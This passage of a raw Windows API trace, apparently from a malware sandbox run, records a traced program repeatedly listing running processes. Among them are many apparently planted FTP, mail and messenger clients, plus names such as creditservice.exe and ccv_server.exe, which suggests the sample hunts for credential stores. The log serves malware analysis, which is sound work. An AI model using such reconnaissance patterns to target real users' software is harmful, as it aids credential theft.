th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0247.299] CloseHandle (hObject=0x22f4) returned 1 [0247.299] Sleep (dwMilliseconds=0x64) [0247.416] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x231c [0247.432] Process32First (in: hSnapshot=0x231c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0247.435] Process32Next (in: hSnapshot=0x231c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x76, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0247.438] Process32Next (in: hSnapshot=0x231c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0247.442] Process32Next (in: hSnapshot=0x231c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0247.444] Process32Next (in: hSnapshot=0x231c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0247.447] Process32Next (in: hSnapshot=0x231c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0247.449] Process32Next (in: hSnapshot=0x231c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0247.452] Process32Next (in: hSnapshot=0x231c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0247.533] Process32Next (in: hSnapshot=0x231c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0247.540] Process32Next (in: hSnapshot=0x231c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0247.542] Process32Next (in: hSnapshot=0x231c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0247.545] Process32Next (in: hSnapshot=0x231c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0247.547] Process32Next (in: hSnapshot=0x231c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0247.549] Process32Next (in: hSnapshot=0x231c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0247.551] Process32Next (in: hSnapshot=0x231c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0247.553] Process32Next (in: hSnapshot=0x231c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0247.556] Process32Next (in: hSnapshot=0x231c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0247.558] Process32Next (in: hSnapshot=0x231c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x49, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0247.560] Process32Next (in: hSnapshot=0x231c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0247.563] Process32Next (in: hSnapshot=0x231c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0247.566] Process32Next (in: hSnapshot=0x231c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0247.568] Process32Next (in: hSnapshot=0x231c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0247.570] Process32Next (in: hSnapshot=0x231c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0247.627] Process32Next (in: hSnapshot=0x231c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0247.630] Process32Next (in: hSnapshot=0x231c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0247.632] Process32Next (in: hSnapshot=0x231c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0247.634] Process32Next (in: hSnapshot=0x231c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0247.636] Process32Next (in: hSnapshot=0x231c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0247.638] Process32Next (in: hSnapshot=0x231c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0247.640] Process32Next (in: hSnapshot=0x231c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0247.644] Process32Next (in: hSnapshot=0x231c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0247.647] Process32Next (in: hSnapshot=0x231c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0247.649] Process32Next (in: hSnapshot=0x231c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0247.653] Process32Next (in: hSnapshot=0x231c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0247.655] Process32Next (in: hSnapshot=0x231c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0247.657] Process32Next (in: hSnapshot=0x231c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0247.659] Process32Next (in: hSnapshot=0x231c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0247.661] Process32Next (in: hSnapshot=0x231c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0247.712] Process32Next (in: hSnapshot=0x231c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0247.715] Process32Next (in: hSnapshot=0x231c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0247.717] Process32Next (in: hSnapshot=0x231c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0247.719] Process32Next (in: hSnapshot=0x231c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0247.721] Process32Next (in: hSnapshot=0x231c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0247.722] Process32Next (in: hSnapshot=0x231c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0247.724] Process32Next (in: hSnapshot=0x231c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0247.727] Process32Next (in: hSnapshot=0x231c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0247.729] Process32Next (in: hSnapshot=0x231c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0247.731] Process32Next (in: hSnapshot=0x231c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0247.733] Process32Next (in: hSnapshot=0x231c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0247.735] Process32Next (in: hSnapshot=0x231c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0247.737] Process32Next (in: hSnapshot=0x231c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0247.740] Process32Next (in: hSnapshot=0x231c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0247.742] Process32Next (in: hSnapshot=0x231c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0247.744] Process32Next (in: hSnapshot=0x231c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0247.746] Process32Next (in: hSnapshot=0x231c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0247.802] Process32Next (in: hSnapshot=0x231c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0247.804] Process32Next (in: hSnapshot=0x231c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0247.806] Process32Next (in: hSnapshot=0x231c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0247.842] Process32Next (in: hSnapshot=0x231c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0247.846] Process32Next (in: hSnapshot=0x231c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0247.849] Process32Next (in: hSnapshot=0x231c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0247.852] Process32Next (in: hSnapshot=0x231c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0247.857] Process32Next (in: hSnapshot=0x231c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0247.860] Process32Next (in: hSnapshot=0x231c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0247.863] Process32Next (in: hSnapshot=0x231c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0247.866] Process32Next (in: hSnapshot=0x231c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0247.928] Process32Next (in: hSnapshot=0x231c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0247.931] Process32Next (in: hSnapshot=0x231c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0247.935] Process32Next (in: hSnapshot=0x231c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0247.938] Process32Next (in: hSnapshot=0x231c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0247.941] Process32Next (in: hSnapshot=0x231c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0247.944] Process32Next (in: hSnapshot=0x231c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0247.947] Process32Next (in: hSnapshot=0x231c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0247.950] Process32Next (in: hSnapshot=0x231c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0247.955] Process32Next (in: hSnapshot=0x231c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0247.958] Process32Next (in: hSnapshot=0x231c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0247.962] Process32Next (in: hSnapshot=0x231c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0247.975] Process32Next (in: hSnapshot=0x231c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0247.978] Process32Next (in: hSnapshot=0x231c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0247.981] Process32Next (in: hSnapshot=0x231c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0247.984] Process32Next (in: hSnapshot=0x231c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0247.987] Process32Next (in: hSnapshot=0x231c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0247.990] Process32Next (in: hSnapshot=0x231c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0247.994] Process32Next (in: hSnapshot=0x231c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0247.998] Process32Next (in: hSnapshot=0x231c, 